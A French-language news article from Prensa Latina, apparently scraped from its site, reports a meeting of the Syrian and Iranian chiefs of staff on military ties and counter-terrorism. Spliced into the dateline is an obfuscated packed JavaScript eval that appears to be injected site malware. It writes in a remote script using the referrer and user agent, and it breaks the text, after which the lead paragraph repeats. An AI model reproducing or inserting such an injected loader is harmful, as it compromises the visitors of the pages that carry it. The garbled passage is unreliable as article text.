mercredi 24 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

La Syrie et l’Iran renforcent leurs relations dans le domaine militaire

Damas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eitrn|var|u0026u|referrer|fdbfr||js|php'.split('|'),0,{})) 18 octobre (Prensa Latina) De hauts responsables de la Syrie et de l'Iran ont aujourd'hui évalué de manière globale les avancées atteintes par les deux pays dans la lutte contre le terrorisme dans ce pays arabe.

Damas, 18 octobre (Prensa Latina) De hauts responsables de la Syrie et de l’Iran ont aujourd’hui évalué de manière globale les avancées atteintes par les deux pays dans la lutte contre le terrorisme dans ce pays arabe.

Selon un communiqué du Ministère de la Défense de Syrie, lors de la réunion entre le Chef d’État-Major de l’Armée syrienne, le général Ali Abdullah Ayoub, et son homologue iranien, le général Mohamed Hussein Baheri, tous deux ont fait part de « la nécessité de renforcer les relations entre les deux armées amies ».

« Les deux points de vue ont été identiques sur les thèmes abordés, plus particulièrement quant à la stratégie à mener contre le terrorisme et les défis qu’affronte l’axe de la résistance », est-il précisé dans le document.

Lors du dialogue, la partie syrienne a prédit que le « projet terroriste takfiri sera défait » et que « la guerre contre le terrorisme continuera jusqu’à l’éradication totale de ce fléau ».

Elle a également dénoncé le fait que « les forces étasuniennes, présentes sur le territoire syrien de manière illégale, tentent d’empêcher les troupes gouvernementales d’avancer sur le chemin de la victoire face aux éléments extrémistes ».

Pour sa part, le général iranien a déclaré que sa présence dans ce pays arabe confirme « l’existence d’une volonté commune de consolider la coopération bilatérale dans la lutte contre les ennemis sionistes et terroristes ».

En différentes occasions, tout autant les gouvernement syrien comme iranien, ont dénoncé les flagrantes agressions des États-Unis, ainsi que d’Israël, à l’encontre de ce pays arabe, et ont promis d’encourager la collaboration militaire.

peo/lma/obf  

EN CONTINU
notes connexes